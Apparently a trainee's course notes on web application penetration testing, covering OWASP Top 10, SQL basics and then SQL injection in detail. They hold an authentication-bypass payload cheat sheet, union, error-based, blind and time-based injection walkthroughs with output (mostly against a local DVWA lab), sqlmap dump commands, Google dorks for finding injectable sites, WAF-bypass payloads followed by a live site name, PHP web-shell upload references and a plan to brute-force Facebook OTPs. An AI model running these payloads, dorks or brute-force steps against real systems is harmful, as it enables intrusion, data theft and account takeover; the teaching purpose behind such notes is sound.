- https://www.youtube.com/watch?v=knc6Iq-hNcw&t=114s
- Receiving ----> www.temp-mail.org
- haveibeenpwned.com
- https://howsecureismypassword.net/
- Email Tracing and Tracking
- ==========================
- Email headers
- https://grabify.link/ --> Try it yourself
- http://www.fuglekos.com/ip-grabber/index.html -->
- http://whoreadme.com
- Email Encryption
- ================
- End-to-end encryption.
- encipher.it
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 9
- =========
- Introduction to Vulnerability Assessment and Penetration Testing
- ----------------------------------------------------------------
- VAPT --> Vulnerability Assessment and Penetration Testing
- V --> Vulnerability
- Loopholes, week security, security misconfiguration. From where an attacker can intrude and compromise your system.
- A --> Assessment
- To scan for the Vulnerability.
- P --> Penetration
- To beach into the system using the above Vulnerability. To hack into or to compromise the system
- T --> Testing
- To generate the report and to pass down. To test the above Vulnerability and to create a report for the same.
- VA --> Vulnerability Assessment
- To scan the web application and to report the Vulnerability
- PT --> Penetration Testing
- To beach into the system and report about those Vulnerabilities.
- VAPT --> Vulnerability Assessment and Penetration Testing
- When we talk about web application VAPT
- ========================================
- OWASP
- =====
- Open Web Application Security Project
- -------------------------------------
- It is non-profit charitable organisation, which works towards the security of the web application. They gather the information from all around the globe. They gather the information through CTF initiative.
- They open challange the whole hacking community, to hack into the online system and capture the flag, in return, they will provide with the bounty. They gather the logs of the attacks which are performed in the CTF.
- After gathering the whole logs, they perform the analysis of these logs and categorise the attacks accordingly.
- They release a list of 10 attacks.
- OWASP TOP 10. --> top 10 attacks.
- 1. Injection
- 2. XSS --> Cross Site Scripting
- 3. CSRF --> Cross Site Request Forgery
- 4. IDOR --> Insecure Direct Object References
- 5. Sensitive Data Exposure
- 6. Missing Function Level Access Control
- 7. Broken Authentication and Session Management
- 8. Invalidated Redirects and Forwards
- 9. Security Misconfigurations
- 10. Using Components with known Vulnerabilities
- OWASP 2013 --> Stable
- OWASP 2017 --> Data sufficient
- https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf
- https://cybermap.kaspersky.com/
- https://www.fireeye.com/cyber-map/threat-map.html
- DBMS
- ====
- DataBase Management System
- --------------------------
- Where, how, when which data is suppose to be stores in which table, in which database, in which column.
- DBA --> Database Administrator
- The Administrator of database, which manages the whole environment's database. DBA need to have the complete knowledge of a programing languages --> SQL
- SQL --> Structured Query Language.
- This is the programing languages which is used by the dba or any user to interact with the database.
- Source --> Delhi
- Destination --> Jalandhar
- Date --> 10/6/2018
- Class -> 2T
- Select trains from database where source="Delhi" and destination="Jalandhar" having class="2T" on date=" 10/06/2018"
- Queries
- =======
- 1. Insert
- Insert into <table_name>(Column_Name) VALUES(Values to be inserted);
- INSERT INTO `info`(`Name`, `Salary`, `Address`, `Gen`) VALUES (Prashant, 10000, Roshan Garden Najafgarh, M);
- 2. Select
- Select * from <table_name>;
- Select * from info;
- 3. UPDATE
- Update <table_name> SET <value to change> where <condition>;
- UPDATE info SET Salary=30000 where Name="Abhijeet Singh";
- 4. Where
- It is a condition
- Select * from info where salary > 15000;
- Select * from info where name like "A%";
- 5. Delete
- DELETE from info WHERE Name="Abhijeet Singh";
- 6. AND
- SELECT * FROM `info` WHERE salary>=20000 and Gen='M';
- 7. Create
- Create table <table_name>(columns_name data_Type Length);
- CREATE table training(Name Text(20), Age int(3), Gender Text(1));
- 8. Order By
- It will arrange the data into either ascending order or in descending order
- SELECT * FROM `training` ORDER BY Name;
- 9. Group By
- To group the data
- SELECT * FROM `training` GROUP by Gender;
- 10. UNION
- SELECT name from info UNION select name from training;
- SELECT name,gen,salary,address from info UNION SELECT name,gender,age,null FROM training;
- 11. Information_schema -->Meta database
- SQL Injection
- =============
- Authentication Bypass
- ---------------------
- To bypass the authentication on any login form and gain teh access as the administrator.
- There are 4 types of authentication
- 1. Basic Authentication
- 2. Integrated Authentication
- 3. Digest Authentication
- 4. Form Based Authentication
- Logic Gates
- ===========
- AND Gate --> If any of the value is false, then the ans will be flase
- 0 and 0 = 0
- 0 and 1 = 0
- 1 and 0 = 0
- 1 and 1 = 1
- OR --> If any of the value is true, then the answer will be true
- 0 or 0 = 0
- 0 or 1 = 1
- 1 or 0 = 1
- 1 or 1 = 1
- 1 ---> True ---> Administrator
- ' ---> Single inverted Comma ---> Use to break the SQL query
- 1'or'1'='1
- select '1'or'1'='1'
- Username --> 1'or'1'='1 always true
- Password --> 1'or'1'='1 always true
- Administrator Login
- x'or'x'='x ---> true
- Cupons| Promo Code ---> 1'or'1'='1
- Cheat sheet
- ===========
- or 1=1
- or 1=1--
- or 1=1#
- or 1=1/*
- admin' --
- admin' #
- admin'/*
- admin' or '1'='1
- admin' or '1'='1'--
- admin' or '1'='1'#
- admin' or '1'='1'/*
- admin'or 1=1 or ''='
- admin' or 1=1
- admin' or 1=1--
- admin' or 1=1#
- admin' or 1=1/*
- admin') or ('1'='1
- admin') or ('1'='1'--
- admin') or ('1'='1'#
- admin') or ('1'='1'/*
- admin') or '1'='1
- admin') or '1'='1'--
- admin') or '1'='1'#
- admin') or '1'='1'/*
- 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
- admin" --
- admin" #
- admin"/*
- admin" or "1"="1
- admin" or "1"="1"--
- admin" or "1"="1"#
- admin" or "1"="1"/*
- admin"or 1=1 or ""="
- admin" or 1=1
- admin" or 1=1--
- admin" or 1=1#
- admin" or 1=1/*
- admin") or ("1"="1
- admin") or ("1"="1"--
- admin") or ("1"="1"#
- admin") or ("1"="1"/*
- admin") or "1"="1
- admin") or "1"="1"--
- admin") or "1"="1"#
- admin") or "1"="1"/*
- 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
- LVS setup
- =========
- Lucideus Vulnerable Simulator
- =============================
- DVWA --> Damm Vulnerable Web Application
- ----------------------------------------
- Open Source
- LVS_1.zip
- 1. Copy the zip file
- 2. Paste it in C:\xampp\htdocs
- 3. Extract the zip file
- LVS_1
- 4. Start the xampp server
- Apache
- MySQL
- 5. Start the browser
- 127.0.0.1/lvs_1
- 6. Click on the link --> lvs111
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 10
- ==========
- Insecure Direct Object References
- ---------------------------------
- A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
- www.bank.com/aofn/akjf.php?id=12 ---> Account1
- www.bank.com/aofn/akjf.php?id=11 ---> Account2
- www.bank.com/aofn/akjf.php?id=10 ---> Account3
- if I will change the id value to another ID value, and can have the access of another account, it is considered to be Insecure Direct Object References
- http://127.0.0.1/wave1/wave1/insecure/myaccount.php?Id=1
- User ID = 1
- Username = Admin
- Password= password
- If I change the value of .php?Id=1 to .php?Id=2, then I can have the access of another account whose ID is 2
- Oyorooms.com/afogn/adifn.php?ID=abhijeet.php
- Oyorooms.com/afogn/adifn.php?ID=admin.php
- id = 1 ---> 1 represents a token containing a value of --> Username, password and other information.
- Get Parameter
- -------------
- php?Id=1 -->
- Something = something
- Sensitive Data Exposure
- =======================
- Personal Data
- Credential Data
- Banking Data
- Economical Data
- Financial Data
- 1. When data is transmitted in the url, that is your crendentials are transmitted via GET Parameter.
- username=user&password=pass&sumbit=submit
- 2. When data is stored in plain text form rather then hashed or encrypted form.
- 3. When data is stored in the text file rather then to be stored in the databsae.
- Id Interest Gender Username Password
- -----------------------------------------------
- 1 Badminton Female admin Pa$$woRd
- 2 Football Male admin2 paSSwOrd
- Consider who can gain access to your sensitive data and any backups of that data. This includes the data at rest, in transit and even in your customers’ browsers. Include both external and internal threats. The Sensitive Data can be exposed in the plain text or in any hash format.
- DVWA
- ====
- Damn Vulnerable Web Application
- -------------------------------
- It is a web application which is Vulnerable by default. This application is used for testing the skills and to perform web application attacks passed by OWASP.
- Could not connect to the database - please check the config file.
- 1. Goto c:\xampp\htdocs\dvwa\dvwa-1.0.8
- 2. Open the config folder
- 3. config.inc.php
- 4. $_DVWA = array();
- $_DVWA[ 'db_server' ] = 'localhost';
- $_DVWA[ 'db_database' ] = 'dvwa';
- $_DVWA[ 'db_user' ] = 'root';
- $_DVWA[ 'db_password' ] = 'p@ssw0rd';
- change the line --> $_DVWA[ 'db_password' ] = 'p@ssw0rd';
- $_DVWA[ 'db_password' ] = '';
- save the file
- Username:admin
- password:password
- SQL Injections
- ==============
- Where an attacker passes the malicious SQL commands just to gain the juicy information from the database.
- SQLi
- UNION BASED SQL INJECTION
- =========================
- Where an attacker uses the union command to collect the information and merge it into one table. He passes malicious commands and queries in the database to do so.
- DEMO
- ====
- DVWA ---> Security:Low
- SQL Injection
- Step 1
- ======
- To find 'GET' parameter.
- something=something
- php?id=something
- php?id=cat
- php?id=1
- php?id=query
- Either you click on some link of the web application|site or enter something in the search box.
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#
- Step 2
- ======
- To generate a SQL error, to break the query.
- 1
- 1'
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#
- You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
- 'select * from table '
- 'select * from table' '
- Step 3
- ======
- To count the number of columns, in the web application.
- For counting the number of columns, I will use order by
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
- Shows me data
- This query means that I am asking the database to arrange the data according to column number 1
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
- Shows me data
- This query means that I am asking the database to arrange the data according to column number 2
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
- Gives me error
- Unknown column '3' in 'order clause'
- This query means that I am asking the database to arrange the data according to column number 3
- But there is no column number 3 --> so it will generate an error
- order by n--+
- n starts from 1 and ends when i receive an error for the value of n
- --+ ---> To comment out
- if there is any data passed down after --+, it will not execute at all.
- There are 2 columns, in the database.
- Step 4
- ======
- To merge the data of all the columns, using UNION command.
- union select 1,2,...,n-1--+
- n=3
- union select 1,2--+
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
- ID: 1' union select 1,2--
- First name: admin
- Surname: admin
- ID: 1' union select 1,2--
- First name: 1
- Surname: 2
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
- database() --> database name
- version() --> Database Version Number
- ID: 1' union select database(),version()--
- First name: admin
- Surname: admin
- ID: 1' union select database(),version()--
- First name: dvwa
- Surname: 10.1.25-MariaDB
- Step 5
- ======
- To call database ki ma --> information_schema, for getting the information about the table names
- Information_schema --> it is meta table --> it contains the name of tables and columns which are present in the database.
- information_schema.tables
- |-> It stores the name of all the table names in the database.
- union select table_name,2 from information_schema.tables--+
- or
- union select 1,table_name from information_schema.tables--+
- http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
- Step 6
- ======
- I will again call database ki maa for columns names in the table names as users
- information_schema
- information_schema.columns
- union select 1,column_name from information_schema.columns where table_name="users"--+
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: admin
- Surname: admin
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: user_id
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: first_name
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: last_name
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: user
- ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
- First name: 1
- Surname: password
- column name --> user_id
- first_name
- Last_name
- user
- password
- Step 7
- ======
- To retreive data from the above data.
- DVWA --> Users --> (User_id,first_name,Last_name,user,Password)
- union select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+
- 1
- admin
- admin
- admin
- 5f4dcc3b5aa765d61d8327deb882cf99
- 2
- Gordon
- Brown
- gordonb
- e99a18c428cb38d5f260853678922e03 --> abc123
- 3
- Hack
- Me
- 1337
- 8d3533d75ae2c3966d7e0d4fcc69216b --> charley
- 4
- Pablo
- Picasso
- pablo
- 0d107d09f5bbe40cade3de5c71e9e9b7
- 5
- Bob
- Smith
- smithy
- 5f4dcc3b5aa765d61d8327deb882cf99
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 11
- ==========
- ERROR BASED SQL INJECTION
- =========================
- Error based SQL Injection is type of SQL Injection technique to make the error message show Data in just the form of Database Errors instead of SQL Syntax error like in Union Based, for when we have a blind vulnerability that shows error, so we can extract sensitive data from the database directly.
- The errors are very useful during the time of development of a web application but they should be disabled on a Live Website, because errors always shows the Internal Sensitive Data of the Database.
- Error Based SQL Injection works on the ASP Technology (asp.net , aspx) which is a open source server side web application Developed by Microsoft, using the Microsoft MSSQL Server.
- TRUE CONDITION :
- ---------------
- Here 1 is True and 0 is False.
- AND GATE REPRESENTATION
- A | B | Resultant |
- ------------------------------|
- 0 | 0 | 0 |
- 0 | 1 | 0 |
- 1 | 0 | 0 |
- 1 | 1 | 1 |
- Checking the Last True Condition it states :
- 1 & 1 = 1 ie; 1*1=1 or True*True = True
- MAKING THIS TRUE CONDITION FALSE
- 1 & 0 = 0 ie; 1*0=0 or True*False = False
- Error Based SQL Injection works by generating a error condition in the SQL Syntax, so that the Database reverts back with the Error along with the Sensitive Data.
- DEMONSTRATION
- ===============
- Normally a SQL Syntax can goes like :
- ?id=10 | ?id=10 and 1 =1 ; //TRUE
- Which means a Condition is true and it will revert a Genuine Website.
- - So, we can change and can create a Error in the SQL Command by :
- ?id=10 and 1=0; //FALSE
- Which will create and revert a Errors of the Database.
- CONDITIONS OF ERROR BASED SQLI
- ===============================
- = Only One Query can execute at a Particular time, not like finding out the Table Names etc we do on Union Based.
- = It works on the basis of Last In First Out (LIFO).
- = Only the Top Table of the Database can be accessed at a single particular time. Same goes for Columns and then for Rows.
- ----
- First as same as Union Based SQLI, we start finding the number of columns and the Vulnerable column. Suppose the vulnerable column is 10.
- After creating a Error, We will start executing the command and extracting the data from the First Table from the Database.
- For selecting the Top First Table (Cause we cannot directly go a “n” number column),
- = ?id=10 and 1=0 select top 1 table_name from information_schema.tables
- This will extract and give the Data of the First Table from the Database Including its name and other entities. If the Data is Juicy then extract it, else we go for the next tables and columns.
- ----
- For deselecting the Top/Current Table and selecting/extracting the next table,
- = ?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in (“Name of the previous tables”)
- Here we are selecting the next Top Table excluding the Previous one and then extracting its data through the Database Errors. For eg. if the First Top Table is named as “Images”, the query will be :
- ?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in (“images”, "guestbook")
- ----
- After getting through our Juicy Table, we go for the data which are situated in there columns.
- = ?id=10 and 1=0 select top 1 column_name from information_schema.columns where table_name not in (“images”)
- Here we get the data of the extracted of the Columns which are not of the Table named Images.
- DEMO
- ====
- http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6--+
- http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--+
- we Will Get The Version Printed on The WebPage
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Here is Our Query To Get The Database.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Now We Have To Get The Tables. As We Want Tables From Primary Database .
- Here Is The Query For Tables From Primary Database.
- Increase The Value Of Limit as LIMIT 0,1 to LIMIT 1,1 LIMIT 2,1 LIMIT 3,1 Until You Get Your Desired Table Name .
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Now We Have to Get The Column Names From The Table Name. We Got Table Of Admin. So Lets Get The Columns From Table Admin . Here Is The Query For Getting Column Names From The Table Admin.
- To Get The Columns From The Table Admin we Have to Encode It In HEX and Then We Can Execute Our Query.
- Here Is that PART in Our Query.
- Table_name=ADMIN
- Here Is The HEX Value of ADMIN=61646d696e
- And Put it With 0x to Build Our Correct Query.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- Increase The Value Of LIMIT to LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 until we Get The Column Name Like Username and Password.
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- After We Get The Column names Like Username And Password. Next Step Is To Extract Data From These Columns.
- WE Put The TABLENAME=Admin
- And
- Column_name_1=username
- Column_name_2=password
- http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password) as char),0x3a)) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- STACKED QUERY SQL INJECTION
- ============================
- Stacked Query SQL Injection is the one which can execute by terminating the original query and adding a new one, it will be possible to modify data and call stored procedures like creating, deleting and modifying the Database with there entities. This technique is massively used in SQL injection attacks and understanding its principle is essential to a sound understanding of this security issue.
- This can done by SQL Injection Automated Tools like “SQLMAP” etc.
- SQLMAP --> Python based Command Line TOOL for automate sql injection
- http://sqlmap.org/
- Python 2.7 --> https://www.python.org/download/releases/2.7/
- HAVIJ --> Illegal tool, GUI based
- SQLMAP
- ======
- 1.
- sqlmap.py
- 2. To test if the website id up or not or if it is vulnerable or not
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1
- 3. To get the database ----> --dbs
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 --dbs
- available databases [2]:
- [*] acuart
- [*] information_schema
- 4. To get the tables
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart --tables
- Database: acuart
- [8 tables]
- +-----------+
- | artists |
- | carts |
- | categ |
- | featured |
- | guestbook |
- | pictures |
- | products |
- | users |
- +-----------+
- 5. To get the columns
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users --columns
- Database: acuart
- Table: users
- [8 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | address | mediumtext |
- | cart | varchar(100) |
- | cc | varchar(100) |
- | email | varchar(100) |
- | name | varchar(100) |
- | pass | varchar(100) |
- | phone | varchar(100) |
- | uname | varchar(100) |
- +---------+--------------+
- 6. To dump the data from the columns
- sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users -C name,uname,pass --dump
- Database: acuart
- Table: users
- [1 entry]
- +------------+-------+------+
- | name | uname | pass |
- +------------+-------+------+
- | John Smith | test | test |
- +------------+-------+------+
- HAVIJ
- =====
- GUI Based tool
- Google Dorks
- ============
- Advance Google Searching Techniques
- -----------------------------------
- Google Hacking Database.
- Arijit Singh
- When ever we search anything on google, google seach enging shows us the data into 3 different colors.
- Blue --> Headings --> Titles
- Green -> Links and urls
- Black -> Content
- intitle: inception
- inurl: inception
- intext: inception
- title--> movie
- url --> inception
- intitle:movie and inrul:inception
- indexof:/inception
- hacking filetype:pdf
- SQL Injection Vulnerable Web Sites
- ----------------------------------
- inurl:php?id=
- inurl:/view/viewer_index.shtml
- Session 12
- ==========
- Introduction to Firewall
- ------------------------
- Firewall
- --------
- It is an extra security layer, which helps me securing our web application and web site. It acts as the middle layer between the data transmission of user and the server.
- Firewall act as the filter. It filters the unwanted packets and malicious packets. Firewall works on the basis of signature and permutation and combination of queries which are transmitted by the user. Knowledgebase --> It acts just like database for signatures and combinations.
- There are two types of firewall:
- 1. Software Solution Firewall
- 2. Hardware Solution Firewall
- Software Solution Firewall
- --------------------------
- These are the softwares which are installed in the server.
- Microsoft windows Firewall
- Hardware Solution Firewall
- --------------------------
- They are the hardwares, which act as the man in the middle, and filters the packet which are malicious.
- MOD Security
- WAF --> Web Application Firewall
- --------------------------------
- MOD Security
- ------------
- Installation of Mod Security
- ============================
- Installing and configuring ModSecurity
- Step 1: open terminal and type
- $ apt-get update
- $ apt-get upgrade
- $ apt-get install apache2
- Step 2: $ sudo apt-get install libapache2-modsecurity
- Step 3: Now we need to place a modsecurity.conf configuration file into the /etc/modsecurity
- $ sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
- now open
- $ sudo nano /etc/modsecurity/modsecurity.conf
- Find this line:
- SecRuleEngine DetectionOnly
- and change it to:
- SecRuleEngine On
- Step 4: now check the apache2 log directory:
- $ ls /var/log/apache2
- You should see three files: access.log, error.log and other_vhosts_access.log.
- Now restart the apache2 service and check this directory again
- $ sudo service apache2 reload
- $ ls /var/log/apache2
- A new log called modsec_audit.log was created
- Step 5: now check the modsecurity-crs direcotry
- $ ls /usr/share/modsecurity-crs/
- the directories: activated_rules, base_rules, experimental_rules and optional_rules
- Step 6: for activate all of the rules in the base_rules and optional_rules directories so execute the following commands in a terminal:
- $ cd /usr/share/modsecurity-crs/base_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/base_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- $ cd ..
- $ cd optional_rules
- $ cd /usr/share/modsecurity-crs/optional_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/optional_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- $ cd ..
- $ cd experimental_rules
- $ cd /usr/share/modsecurity-crs/experimental_rules
- $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/experimental_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done
- Step 7: we need to tell apache where to find the activated rules. Open the /etc/apache2/mods-available/security2.conf file.
- $ sudo nano /etc/apache2/mods-available/security2.conf
- At the end of the file just before </IfModule> enter the following lines:
- Include "/usr/share/modsecurity-crs/*.conf"
- Include "/usr/share/modsecurity-crs/activated_rules/*.conf"
- save it
- Step 8: We must enable the headers module, this allows ModSecurity to control and modify the HTTP headers for both requests and responses.
- $ sudo a2enmod headers
- Now restart apache:
- $ sudo service apache2 restart
- cd /etc/apache2/sites-available
- ls ---> 000-default.conf
- sudo nano 000-default.conf
- edit
- ProxyPass --> Web application IP
- ProxyPassReverse --> Web application IP
- save and exit
- sudo service apache2 restart
- Bypassing MOD_SECURITY
- ======================
- union select 1,2--+
- Block
- Mix Cases
- UnIoN SeLeCt 1,2--+
- Inline Executable Comments
- /*!......*/
- /*!UnIoN*/ /*!SeLeCt*/ 1,2--+
- /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+
- /*!UnIoN*/ /*!SeLeCt*/ 1,table_name from /*information_schema.tables*/--+
- http://www.slightergolf.com
- BLIND SQL INJECTION
- ===================
- Blind SQL injection is a type of sql injection attack that ask the database true or false questions and determine the answer based on the application response. This attack is often used when the web application is configured to show generic error message, but has not mitigated the code that is vulnerable to SQLi. This type of sql injection is identical to normal sql injection, the only is the data retreived from the database.
- 1. Blind Boolean
- 2. Time Based SQL Injection
- http://newsletter.com/items.php?id=2
- ------------------------------------
- select title,description from items where id=2
- ----------------------------------------------
- http://newsletter.com/items.php?id=2 and 1=2
- select title,description from items where id=2 and 1=2
- Demo
- ====
- 1
- 1'
- 1' and 1=0 # ---> False --> Did not gave me data
- 1' and 1=1 # ---> True --> It gave me data
- 1' and 1=0 order by 1 # --> No Result ---> Generic error
- 1' and 1=1 order by 1 # --> Result --> normal result
- 1' and 1=0 order by 2 # --> No result
- 1' and 1=1 order by 2 # ---> Result
- 1' and 1=0 order by 3 # ---> No Result
- 1' and 1=1 order by 3 # ---> No Result ---> True ---> there are 2 number of columns
- 1' and 1=0 union select 1,2 #
- ID: 1' and 1=0 union select 1,2 #
- First name: 1
- Surname: 2
- 1' and 1=1 union select 1,2 #
- ID: 1' and 1=1 union select 1,2 #
- First name: admin
- Surname: admin
- ID: 1' and 1=1 union select 1,2 #
- First name: 1
- Surname: 2
- 1' and 1=0 union select NULL,2 # --> nO dATA
- 1' and 1=1 union select null,2 #---> Shows Data
- ID: 1' and 1=1 union select null,2 #
- First name: admin
- Surname: admin
- ID: 1' and 1=1 union select null,2 #
- First name:
- Surname: 2
- 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,1,1)=4 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,1,1)=3 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,1,1)=2 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,1,1)=1 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=1 #
- First name:
- Surname: 1
- 1' and 1=0 union select null,substr(@@version,2,1)=1 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,2,1)=2 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,2,1)=3 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 0
- 1' and 1=0 union select null,substr(@@version,2,1)=0 #
- ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
- First name:
- Surname: 1
- 1' and 1=0 union select null, table_name from information_schema.tables #
- 1' and 1=0 union select null, table_name from information_schema.tables where table_schema != 'information_schema' and table_schema != 'mysql' #
- 10.1.25-MariaDB
- substr(@@version,1,1) ----> 1
- -
- x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 13
- ==========
- Time Based SQL Injection
- ========================
- This type fo sql injection relies on the database pausing for a specific amount of time, when returning the results, indicating successful SQL Query execution.
- sleep()
- delay()
- hibernate()
- Basic syntax
- select if(expression,true,false)
- This type of SQL injection is sub type of Blind Based SQL Injection. This is considered to by our last resort.
- sleep(3) --> sleep the database for 3 seconds and then give me result.
- DEMO
- ====
- 1 --> result
- 1' --> no result
- Instantly reloading the page
- 1' - sleep(3) #
- ID: 1' - sleep(3) #
- First name: admin
- Surname: admin
- 1' - if(mid(version(),1,1)='5', sleep(3),0) #
- ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
- First name: admin
- Surname: admin
- This query will load the response Instantly.
- 1' - if(mid(version(),1,1)='4', sleep(3),0) #
- ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
- First name: admin
- Surname: admin
- This query will load the response Instantly.
- 1' - if(mid(version(),1,1)='3', sleep(3),0) #
- ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
- First name: admin
- Surname: admin
- This query will load the response Instantly.
- 1' - if(mid(version(),1,1)='2', sleep(3),0) #
- ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
- First name: admin
- Surname: admin
- This query will load the response Instantly.
- 1' - if(mid(version(),1,1)='1', sleep(3),0) #
- ID: 1' - if(mid(version(),1,1)='1', sleep(3),0) #
- First name: admin
- Surname: admin
- This query will load the response after a delay of 3 seconds.
- which means, that the first character of version is '1'
- POST PARAMETER INJECTION
- ========================
- We will tamper the data, using third part application.
- Burp Suite
- Tamper Data
- Arbitrary File Upload
- =====================
- When the web application askes you to input or upload some kind of document, but instead the person uploads some kind of malicious file. Like darkComet.exe, b374k.php
- b374k.php ---> PHP Shell --> PHP Trojan
- Connection from dark Comet ---> connection via a php code, server ka remote access.
- https://pastebin.com/raw/KpNsxj0c
- https://pastebin.com/raw/ATJE7VdZ
- Tools To Automate VAPT
- ======================
- Accunetix --> https://www.acunetix.com/vulnerability-scanner/wvs-demo-requested/
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 14
- ==========
- Introduction To Burp Suite
- --------------------------
- Brute Forcing
- Anand Prakash
- =============
- Hack Into any fb account
- twitter account
- OLA and Uber rides for free
- Food For Free
- www.facebook.com ---> wrong credentials ---> Forget Password --> OTP
- 4 digits ---> 0000-9999 ---> 10,000 different number
- 5 min
- 5 wirng otp ---> block
- m.facebook.com ---> forget password ---> OTP
- Brute Forcing
- Unlimited try
- Burp Suite Download Link
- https://portswigger.net/burp/communitydownload
- I Will open the Brute Force Page of DVWA
- Browser setting ---> proxy settings
